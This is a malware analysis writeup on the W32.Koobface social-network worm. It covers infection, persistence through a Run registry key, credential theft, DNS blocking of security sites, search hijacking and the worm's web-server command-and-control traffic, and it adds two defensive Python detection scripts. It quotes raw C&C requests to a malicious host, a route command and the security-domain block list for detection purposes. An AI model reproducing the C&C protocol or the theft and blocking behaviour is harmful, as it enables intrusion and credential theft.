
W32.Koobface

Risk Level 2: Low

Discovered:
August 3, 2008
Updated:
August 8, 2012 2:44:59 PM
Also Known As:
Net-Worm.Win32.Koobface.b [Kaspersky], W32/Koobface.worm [McAfee], Boface.A [Panda Software], WORM_KOOBFACE.V [Trend], W32/Koobface-AS [Sophos], W32/Koobface-AL [Sophos], W32/Koobface-AD [Sophos], Koobface.GQ [Panda Software], Koobface.FU [Panda Software], W32/Koobface-N [Sophos], WORM_KOOBFACE.JG [Trend], WORM_KOOBFACE.EX [Trend], WORM_KOOBFACE.EY [Trend], WORM_KOOBFACE.BX [Trend], W32/Koobface.CZ [F-Secure], WORM_KOOBFACE.AZ [Trend], Net-Worm:W32/Koobface.ES [F-Secure], Win32/Koobface.AC [Computer Associates], W32/Koobface.CY [F-Secure], W32/Koobface.BM [F-Secure], WORM_KOOBFACE.F [Trend], WORM_KOOBFACE.E [Trend], Kbface [Panda Software], WORM_KOOBFACE.D [Trend], Troj/Mdrop-CMW [Sophos]
Type:
Worm
Infection Length:
Varies
Systems Affected:
Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Vista, Windows XP
1. Prevention and avoidance
1.1 User behavior and precautions
1.2 Patch operating system and software
2. Infection method
3. Functionality
3.1 Installation
3.2 DNS blocking
3.3 Infostealing
3.4 Search results redirection
3.5 Network traffic redirection
3.6 Web server
3.7 CAPTCHA breaking

4. System modifications
5. Network activity
6. Additional information



1. PREVENTION AND AVOIDANCE
The following actions can be taken to avoid or minimize the risk from this threat.


1.1 User behavior and precautions
This threat may be spread by users actively clicking on links posted to social networking sites. A social engineering lure is often used by the malware creators; a common technique is to add some kind of salacious or sensational news or a statement that will pique the user's interest and entice them to click on the bogus links.

Users of social networking sites should always show caution when clicking on links posted by other users, including their friends. Poor grammar and spelling in messages bundled with the link are often a good sign that the link is not legitimate and was not posted by the supposed user. Basic checks such as hovering with the mouse pointer over the link will normally show where the link leads to. Users can also check online website rating services, such as safeweb.norton.com, to see if the site is deemed safe to visit.

Users should be wary of any site that offers a video but then states that a codec or other software is necessary to view it. These videos are often booby-trapped with malicious software, and this is a known method by which the threat spreads.


1.2 Patch operating system and software
Users are advised to ensure that their operating systems and any installed software are fully patched, and that antivirus and firewall software is up to date and operational. Users are recommended to turn on automatic updates if available so that their computers can receive the latest patches and updates when they are made available.



2. INFECTION METHOD
W32.Koobface spreads primarily through social networking sites as links to videos. When a user visits the website that is hosting the video, they are prompted to download a video codec or other necessary update, which is actually a copy of the worm.

The web servers hosting the fake websites and the worm executable are actually computers compromised by the worm. W32.Koobface constantly changes the style of fake websites and has previously used fake Facebook video pages, YouTube pages, CNET download pages, Facebook security pages, and online virus scan pages. A single compromised computer acting as a Koobface web server can host multiple versions of these fake sites.








To spread in social networking sites, the worm searches for browser cookies on the compromised computer to check which social networking sites are used. If any are found, the command and control server may request the compromised computer to download a component that is designed to spread the worm on that specific social networking site.

The following is an example of files downloaded, saved, and executed based on which social networking site the code targets:

Social networking site   File name used in GET request   File name when saved
Facebook                 fb[VERSION NUMBER].exe          freddy[VERSION NUMBER].exe
hi5                      hi[VERSION NUMBER].exe          hippy[VERSION NUMBER].exe
MySpace                  ms[VERSION NUMBER].exe          mstre[VERSION NUMBER].exe
Twitter                  tw[VERSION NUMBER].exe          twitty[VERSION NUMBER].exe
Bebo                     be[VERSION NUMBER].exe          sber[VERSION NUMBER].exe
Tagged                   tg[VERSION NUMBER].exe          tag[VERSION NUMBER].exe
Netlog                   nl[VERSION NUMBER].exe          nl[VERSION NUMBER].exe
Fubar                    fu[VERSION NUMBER].exe          fu[VERSION NUMBER].exe
Friendster               fr[VERSION NUMBER].exe          fr[VERSION NUMBER].exe
MyYearbook               yb[VERSION NUMBER].exe          yb[VERSION NUMBER].exe


The files are requested from the command and control server and saved to the %Windir% folder.

The worm does not necessarily serve all the propagation components all the time. For example, a user who utilizes all of these social networks may only receive modules for some of them.

These modules contain code specific to the social network being targeted. Using the session authentication cookie on the compromised computer, the worm is able to pose as the user and post malicious links to contacts in the user’s social network.

For example, when a user is logged into Facebook and a browser window is open, the worm will hide the browser window to hide its activities from the user. With no visible window to make the affected user suspicious, it then posts the messages containing malicious links that are provided by the command and control server.

The following is an example of how the Facebook module spreads W32.Koobface on Facebook.
The worm first sends a message through Facebook to all the friends of an infected user. It is able to do this by hijacking the Facebook session authentication cookie on the compromised computer. The worm will also convert Firefox cookies into Internet Explorer cookies when it needs to.

A friend of an infected Facebook user might receive the message to view an interesting video or have a similar link posted to their Facebook wall.







If the user clicks on the malicious link, they are led to a malicious web site that eventually redirects the user to a fake video page. The fake video page prompts the user to download a codec to view the video. The codec is actually the worm installer.








3. FUNCTIONALITY

The worm is able to perform the following functions:
  • Spread through social networks
  • Steal confidential information
  • Inject advertising into web browsers
  • Redirect web browsing to malicious sites
  • Intercept Internet traffic
  • Block access to certain Internet sites
  • Start a web server to serve as a command and control server for other Koobface infections
  • Download additional files, such as updates to itself and other pay-per-install software that includes fake security products
  • Steal software license keys
  • Break CAPTCHAs
  • Determine if a link is blocked by Facebook
  • Create new Blogspot accounts and pages
  • Modify the Hosts file


3.1 Installation
W32.Koobface arrives as a file, often posing as a fake codec installer (e.g. setup.exe), after the user clicks a link on a social networking site. Upon execution, it copies itself into the Windows directory. The file name used for the copy is hardcoded and depends on the version or build of the worm (e.g. ld02.exe, ld10.exe, ld14.exe, etc.).

The worm also has a self-checking routine where it verifies if the main component is running inside the Windows directory (C:\Windows\[VARIANT].exe) under the file name used by the current version of the component (e.g. C:\Windows\ld14.exe). If it is not, it copies itself into the aforementioned directory, runs the copy, and then drops a batch file (C:\[VARIANT].bat) that deletes the current executable after it terminates.

It creates a mutex, whose name contains alphanumeric characters, so that only one instance of the worm runs on the compromised computer. The mutex name is hardcoded but appears to have been randomly generated before it was hardcoded. The name may also vary in each version or build of the worm.

Note: The names used for the objects and file names for any components vary in different variants.

It creates the following registry entry so that it runs every time Windows starts:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"sys[VARIANT]tray" = "%Windir%\[VARIANT][VERSION NUMBER].exe"

Note: The following registry entries are examples of the above registry entry:
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"sysldtray" = "%Windir%\ld16.exe"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"systwtray" = "%Windir%\twitty02.exe"
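The persistence pattern above (value name sys[VARIANT]tray, data %Windir%\[VARIANT][VERSION NUMBER].exe) lends itself to a simple triage check. The following Python script is an added example, not part of the writeup or of any Symantec tooling: it classifies exported Run-key values against that pattern and the module prefixes the writeup lists. The sample entries are constructed, and the confidence levels are an assumption of this example.

```python
import re

# Constructed sample of HKLM\...\CurrentVersion\Run values (name, data) as
# they might be exported from a machine under triage. Not taken from the
# writeup; the file names merely follow the naming pattern it describes.
SAMPLE_RUN_VALUES = [
    ("ctfmon.exe", r"C:\Windows\system32\ctfmon.exe"),
    ("sysldtray", r"%Windir%\ld16.exe"),
    ("systwtray", r"%Windir%\twitty02.exe"),
    ("sysfbtray", r"%Windir%\freddy07.exe"),
    ("sysxxtray", r"%Windir%\zz03.exe"),
]

# File-name prefixes the writeup lists: the main "ld" component, the
# propagation modules (GET name and saved name) and the v2prx DNS blocker.
KNOWN_PREFIXES = {
    "ld", "fb", "freddy", "hi", "hippy", "ms", "mstre", "tw", "twitty",
    "be", "sber", "tg", "tag", "nl", "fu", "fr", "yb", "v2prx",
}

# Value name sys[VARIANT]tray and data %Windir%\[VARIANT][VERSION NUMBER].exe
NAME_RE = re.compile(r"^sys([a-z]{1,6})tray$", re.IGNORECASE)
DATA_RE = re.compile(
    r"^(?:%windir%|%systemroot%|c:\\windows)\\([a-z]+)(\d{1,3})\.exe$",
    re.IGNORECASE,
)


def classify_run_value(name, data):
    """Return a finding dict if a Run entry matches the Koobface persistence
    pattern from section 3.1, otherwise None.

    Both halves must match. A file prefix outside KNOWN_PREFIXES is reported
    with lower confidence rather than dropped, because the writeup notes that
    object and file names vary between builds (confidence levels are an
    assumption of this example).
    """
    name_m = NAME_RE.match(name)
    data_m = DATA_RE.match(data)
    if not (name_m and data_m):
        return None
    prefix = data_m.group(1).lower()
    return {
        "value_name": name,
        "variant": name_m.group(1).lower(),
        "module": f"{prefix}{data_m.group(2)}.exe",
        "version": int(data_m.group(2)),
        "confidence": "high" if prefix in KNOWN_PREFIXES else "medium",
    }


def triage_run_values(entries):
    """Apply classify_run_value to every (name, data) pair and keep the hits."""
    return [hit for hit in (classify_run_value(n, d) for n, d in entries) if hit]


if __name__ == "__main__":
    for hit in triage_run_values(SAMPLE_RUN_VALUES):
        print(hit)
```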


3.2 DNS blocking
The worm prevents the compromised computer from visiting a variety of domains, most of which are well-known security websites. The module performing this action is typically named v2prx.exe and drops the following two files:
  • ddnsFilter.dll or filter.sys
  • fio32.dll or fio32.sys

Any domains containing the following substrings are blocked:
  • a-2.org
  • agnitum
  • aluriasoftware
  • antivir
  • antiviraldp
  • anti-virus
  • attechnical
  • authentium
  • avast
  • avgfrance
  • avg.
  • avp.
  • bitdefender
  • blackice
  • ccsoftware
  • centralcommand
  • deerfield
  • dialognauka
  • diamondcs
  • drsolomon
  • drweb
  • eicar
  • emsisoft
  • esafe
  • eset
  • fileburst
  • finjan
  • fmsinc
  • free-av
  • f-secure
  • gecadsoftware
  • grisoft
  • gwava
  • hackerwatch
  • housecall
  • iavs.cz
  • ieupdate
  • ikarus-software
  • inline-software
  • javacoolsoftware
  • kaspersky
  • kerio
  • k-otik
  • lavasoft
  • liutilities
  • looknstop
  • malwarebytes
  • mcafee
  • megasecurity
  • microworldsystems
  • misec
  • moosoft
  • my-etrust
  • networkassociates
  • noadware
  • nod32
  • norman.no
  • nsclean
  • openantivirus
  • pandasoftware
  • pestpatrol
  • psnw.
  • pspl.
  • ravantivirus
  • safer-networking
  • safetynet
  • sald.com
  • securitoo
  • secuser
  • simplysup
  • sophos
  • spyblocker-software
  • spycop
  • spywareguide
  • stiller
  • sybari
  • sygate
  • symantec
  • tinysoftware
  • toonbox
  • trapware
  • trendmicro
  • turvamies
  • viguard
  • viruslist
  • virustotal
  • visualizesoftware
  • vsantivirus
  • wilderssecurity
  • wildlist
  • windowsupdate
  • winpatrol
  • x-cleaner
  • zeylstra
  • zonelabs
  • zonelog

In addition, the configured DNS server may be changed.


3.3 Infostealing
W32.Koobface is able to steal confidential information. This functionality is implemented in a separate module and has been seen to be downloaded and saved using the following file names:
  • go.exe
  • get.exe

Using this module, the worm gathers system information - such as product ID, installed applications, usernames, POP3 server, login credentials, and user locale - and compiles the data into P3ML format. The worm uses base64 to encode this collected information and posts it to one of its command and control servers.

Targeted login credentials include FTP, email, instant messaging, web profile, and filesharing accounts, including the login credentials of the following applications:
  • Becky! Internet Mail
  • Coffeecup Software
  • cuteFTP
  • Depositfiles
  • Eudora
  • FTP commander
  • FileZilla
  • FlashFXP
  • GAIM
  • ICQ
  • Ipswitch
  • Mail.ru
  • Megaupload
  • Microsoft Outlook
  • Mozilla
  • Mozilla Thunderbird
  • Opera
  • Outlook Express
  • Passport.NET
  • Punto Switcher
  • QIP
  • RITLabs The Bat! Email client
  • Rapget
  • Rapidshare
  • SmartFTP
  • Total Commander
  • Trillian
  • Universal Share Downloader
  • Windows Live

In addition, the worm gathers and steals social networking profile information. Social networks store a variety of information, such as geographic location, birth date, activities, schools attended, email addresses, contact lists, and interests. This information is gathered and sent to the command and control server through HTTP POST requests.




Decoding the requests confirms the wide range of information collected and sent to the command and control server.





3.4 Search results redirection
The worm has the ability to inject code into web search results listings. When the user clicks on a valid link in a search results listing, it redirects them to advertising or other malicious content. Again, this functionality is implemented as a downloadable module.

This module has been seen distributed in two ways:
  1. Separate files (BrowserCtl.dll or BrowserCtl.sys)
  2. Integrated into the DNS blocker component (DDnsFilter.DLL)

The module searches for the following tokens or substrings in a URL to find potential searches or queries to hijack:
  • hTtp/1.1 404 reSOURcE NoT FOunD\r\n\r
  • google
  • search.yahoo
  • search.msn
  • search.live
  • bing
  • search.aol
  • ask
  • search.mywebsearch
  • inurl:
  • related:
  • intitle:
  • intext:
  • cache:
  • tbns:
  • toolbarqueries
  • googleadservices
  • sugg.search
  • img.youtube.com
  • .yimg.com
  • metacafe.com
  • yahooapis.com
  • .aolcdn.com
  • .sa.aol.com

Manipulated search results may point users to rigged web sites controlled by the attacker. These web sites may serve fake virus infection warnings and lead users to download other malware, such as misleading applications.





The following is an example of the sequence of transactions between the search redirector and the command and control server.

First, a user searches for ‘stanley’ using google.com:

GET /complete/search?hl=en&q=stanley HTTP/1.1
Referer: http://www.google.com/

The worm detects the search and sends the same search term to the Koobface command and control server. The command and control server returns information on where to redirect the user:

GeT /v50/?v=92&s=G&uid=-207922....&p=1000&q=stanley HttP/1.0

When clicking on a result listing, the compromised computer is instead redirected to a fake security scan site used to spread misleading applications.

POST /click.php?c=6cd95921027704e5677a3f732600 HTTP/1.1

GET /online/9eb761c878134c642afeef551b8048ca/f67b46eed9e6f7d9e584824b2edeed9c/3656b9eddb95cfb9d7f013ed46b015a2 HTTP/1.1


3.5 Network traffic redirection
W32.Koobface may reroute outbound Internet traffic if directed by the command and control server. When the command BLOCKIP is given by the command and control server, the worm agent adds an entry with the following format to the local IP routing table:

route add -p [DEST_ADDRESS] mask [SUBNET_MASK] [HOP_ADDRESS] metric 3

This entry adds a persistent route to the destination [DEST_ADDRESS] with a subnet mask of [SUBNET_MASK], a next hop address of [HOP_ADDRESS], and a cost metric of 3. Through this, the BLOCKIP command would intercept traffic trying to reach the defined network address range. However, typically the worm uses this feature solely to block access to certain network ranges.


3.6 Web server
The worm may start a web server on the compromised computer, the primary purpose being to spread itself.

The following file is the module that acts as the web server:
%ProgramFiles%\webserver\webserver.exe

Files to be served by the web server are stored in an XML file named:
%ProgramFiles%\webserver\webserver.dat

Using the Windows netsh tool, the web server module modifies the exception list of the Windows Firewall to allow incoming connections to TCP ports 80 and 53.

Note: As of this writing, this component has no DNS server functionality and neither TCP nor UDP port 53 is used at any time.

It installs itself as a service named webserver using Windows’ sc utility.

The XML-formatted data file (webserver.dat) contains the latest binary installer of the worm (e.g., setup.exe) and the related HTML pages, icons, or images used for the campaign websites shown to the target user, such as fake Facebook video pages, fake YouTube video pages, or fake CNET download pages.

The web server reports to a remote server and then receives an XML file from the C&C domain and saves it into a .dat file inside the %ProgramFiles%\webserver folder.

The web server module on a newly compromised computer first contacts another compromised computer, which serves as a command and control server, to retrieve the files to distribute.

POST /webserver/?uptime=782254&v=0&sub=56&ping=135&proxy=0 HTTP/1.0
accept-encoding: text/html, text/plain
COnnecTIon: cLOse
Host: capthcabreak.com
Content-Type: binary/octet-stream
Content-Length: 0

HTTP/1.1 200 OK
Date: [DATE]
Server: Apache/1.3.41 (Unix)
Cache-Control: no-cache
Content-Length: [CONTENT_SIZE]
Connection: close
Content-Type: text/xml
[XML data file]

The command and control server will then contact the newly compromised computer to determine the computer’s uptime and to ensure the web server module is working correctly.

Note: The worm’s web server pretends to be running “Apache/1.3.27 (Unix) (Red-Hat/Linux).”

GET /?uptime HTTP/1.0

HTTP/1.1 200 OK
Content-Length: 13
Connection: close
Server: Apache/1.3.27 (Unix) (Red-Hat/Linux)
Content-Type: text/html
uptime=782255

Finally, the command and control server also verifies that the newly compromised computer is properly distributing the worm.

GET /pid=1000/setup.exe HTTP/1.0
Sample Web server response:
HTTP/1.1 200 OK
Content-Length: 38656
Connection: close
Server: Apache/1.3.27 (Unix) (Red-Hat/Linux)
Content-Type: application/octet-stream

[KOOBFACE INSTALLER BINARY]

Whenever the worm’s web server is accessed, the component includes the access logs in its report to the command and control server. Each log has the following format:
[HOST_IP_ADDRESS]|[USER_AGENT_INFO]|[URL]|[DOMAIN_REDIRECTOR]|[COMPONENT_DIRECTORY]|1000
POST /webserver/?uptime=1004&v=158&sub=56&ping=68&proxy=0 HTTP/1.0
accept-encoding: text/html, text/plain
COnnecTIon: cLOse
Host: capthcabreak.com
Content-Type: binary/octet-stream
Content-Length: 323
75.64.192.29|Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)|||ms|1000
75.64.192.29|Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)|[http://]74.2.159.54/pid=1000/view/f=ms/console=ye[REMOVED]

HTTP/1.1 200 OK
Date: Thu, 12 Nov 2009 01:27:56 GMT
Server: Apache/1.3.41 (Unix)
Cache-Control: no-cache
Content-Length: 96
Connection: close
Content-Type: text/xml
<?xml version="1.0"?><webserver is_available="yes" version="158" stats_loaded="yes"></webserver>
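Sections 3.4 and 3.6 both show request patterns that a proxy log or IDS can key on: the case-mangled tokens ("GeT", "HttP/1.0", "COnnecTIon: cLOse"), the /v50/ search-term relay, and the /webserver/?uptime= check-in with its pipe-delimited access-log report. The following Python script is an added example, not part of the writeup: it parses a raw request, flags those indicators, and splits the report lines. The sample requests, hosts, addresses and uid are constructed, and the case heuristics are assumptions of this example, not published signatures.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample requests modelled on the exchanges in sections 3.4 and
# 3.6. Hosts, IPs and the uid are placeholders, not values from the writeup.
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "Connection: close\r\n\r\n",
    "GeT /v50/?v=92&s=G&uid=-2079220000&p=1000&q=stanley HttP/1.0\r\n"
    "Host: cc.example.invalid\r\n\r\n",
    "POST /webserver/?uptime=1004&v=158&sub=56&ping=68&proxy=0 HTTP/1.0\r\n"
    "accept-encoding: text/html, text/plain\r\nCOnnecTIon: cLOse\r\n"
    "Host: cc.example.invalid\r\nContent-Type: binary/octet-stream\r\n\r\n"
    "192.0.2.10|Mozilla/4.0 (compatible; MSIE 7.0)|||ms|1000\n"
    "192.0.2.10|Mozilla/4.0 (compatible; MSIE 7.0)"
    "|[http://]198.51.100.7/pid=1000/view/f=ms|||1000\n",
]

REQUEST_LINE_RE = re.compile(r"^(\S+) (\S+) (HTTP/1\.[01])$", re.IGNORECASE)
# Field order of the access-log lines the web server module uploads.
REPORT_FIELDS = ("host_ip", "user_agent", "url", "redirector", "component", "pid")


def parse_request(raw):
    """Minimal HTTP/1.x request parser: request line, header names, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    m = REQUEST_LINE_RE.match(lines[0])
    if not m:
        raise ValueError("not an HTTP/1.x request line: %r" % lines[0])
    header_names = [line.partition(":")[0].strip() for line in lines[1:]]
    return {"method": m.group(1), "target": m.group(2), "version": m.group(3),
            "header_names": header_names, "body": body}


def header_name_is_mangled(name):
    """Heuristic (assumption): browsers send Title-Case or all-lowercase
    header names; interior capitals such as COnnecTIon do not occur.
    Short all-caps names (DNT, TE) are exempt."""
    return any(part[1:] != part[1:].lower() and not part.isupper()
               for part in name.split("-"))


def parse_webserver_report(body):
    """Split HOST_IP|USER_AGENT|URL|DOMAIN_REDIRECTOR|COMPONENT_DIRECTORY|1000
    lines into dicts; lines with the wrong field count are skipped."""
    records = []
    for line in body.splitlines():
        fields = line.split("|")
        if len(fields) == len(REPORT_FIELDS):
            records.append(dict(zip(REPORT_FIELDS, fields)))
    return records


def classify_request(raw):
    """Return the Koobface indicators found in one request plus any parsed
    access-log report it carried."""
    req = parse_request(raw)
    indicators = []
    # "GeT" / "HttP/1.0": no browser or standard HTTP library emits these.
    if (req["method"], req["version"]) != (req["method"].upper(), req["version"].upper()):
        indicators.append("mangled_case_tokens")
    if any(header_name_is_mangled(h) for h in req["header_names"]):
        indicators.append("mangled_case_headers")
    url = urlsplit(req["target"])
    qs = parse_qs(url.query)
    # Section 3.4: the redirector relays the victim's search term to the C&C.
    if url.path.startswith("/v50/") and {"uid", "q"}.issubset(qs):
        indicators.append("search_relay:" + qs["q"][0])
    # Section 3.6: web server module check-in, optionally carrying access logs.
    report = []
    if url.path == "/webserver/" and "uptime" in qs:
        indicators.append("webserver_checkin")
        report = parse_webserver_report(req["body"])
    return {"indicators": indicators, "report": report}


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        print(classify_request(raw))
```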


3.7 CAPTCHA breaking
The worm may encounter CAPTCHAs when trying to post to social networking sites. CAPTCHA is a method devised to prevent automated systems from accessing services designed to be used by humans; CAPTCHAs are often used in website sign-up processes to prevent automated account creation. To bypass them, Koobface uploads the CAPTCHA to the command and control server, which displays it on another compromised computer. The CAPTCHA is displayed in full-screen mode, and the user of that computer cannot continue to use it until they solve the CAPTCHA.

The CAPTCHA solution is then forwarded back to the originally requesting computer. Using this method the controllers of the Koobface botnet can not only leverage the compromised computers for their own gain but they also coerce the users of those computers to perform work for them. This in effect creates a worldwide distributed work force that works for the Koobface controllers for free.






4. SYSTEM MODIFICATIONS

The following side effects may be observed on computers compromised by members of this threat family.


Files/folders created
One or more of the following files:
  • be[VERSION NUMBER].exe
  • fb[VERSION NUMBER].exe
  • fr[VERSION NUMBER].exe
  • freddy[VERSION NUMBER].exe
  • fu[VERSION NUMBER].exe
  • hi[VERSION NUMBER].exe
  • hippy[VERSION NUMBER].exe
  • ms[VERSION NUMBER].exe
  • mstre[VERSION NUMBER].exe
  • nl[VERSION NUMBER].exe
  • sber[VERSION NUMBER].exe
  • tag[VERSION NUMBER].exe
  • tg[VERSION NUMBER].exe
  • tw[VERSION NUMBER].exe
  • twitty[VERSION NUMBER].exe
  • yb[VERSION NUMBER].exe


Files/folders deleted
None


Files/folders modified
None


Registry subkeys/entries created
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"sys[VARIANT]tray" = "%Windir%\[VARIANT][VERSION NUMBER].exe"

Note: The following registry entries are examples of the above registry entry:
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"sysldtray" = "%Windir%\ld16.exe"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"systwtray" = "%Windir%\twitty02.exe"


Registry subkeys/entries deleted
None


Registry subkeys/entries modified (final values given)
None



5. NETWORK ACTIVITY
The threat may perform the following network activities.


Downloading
  • May download additional files that are code modules containing additional functionality, updates, or configuration files.
  • May download advertisements from the following sites:
    • [http://]91.188.59.186/main[REMOVED]
    • [http://]91.188.59.187/main[REMOVED]
    • [http://]www.kyxct.in/get[REMOVED]
    • [http://]195.78.108.230/get[REMOVED]
    • [http://]www.lskjf.in/get[REMOVED]
    • [http://]www.rtlyh.in/get[REMOVED]
    • [http://]www.ptyoj.in/get[REMOVED]


Uploading
May upload confidential information to a remote location.


Other network activity
  • May block access to specified domains by performing DNS blocking or modifying the Hosts file.
  • May reroute outbound Internet traffic to specified domains.
  • May redirect web search results to advertising or other malicious content.



6. ADDITIONAL INFORMATION
For more information relating to this threat family, please see the following resources:

Recommendations

Symantec Security Response encourages all users and administrators to adhere to the following basic security "best practices":

  • Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world.
  • Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised.
  • Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.
  • Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available.
  • Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.
  • Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have fewer avenues of attack.
  • If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied.
  • Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.
  • Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.
  • Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media.
  • Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.
  • If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.
  • For further information on the terms used in this document, please refer to the Security Response glossary.
Writeup By: Eric Chien and Jarrad Shearer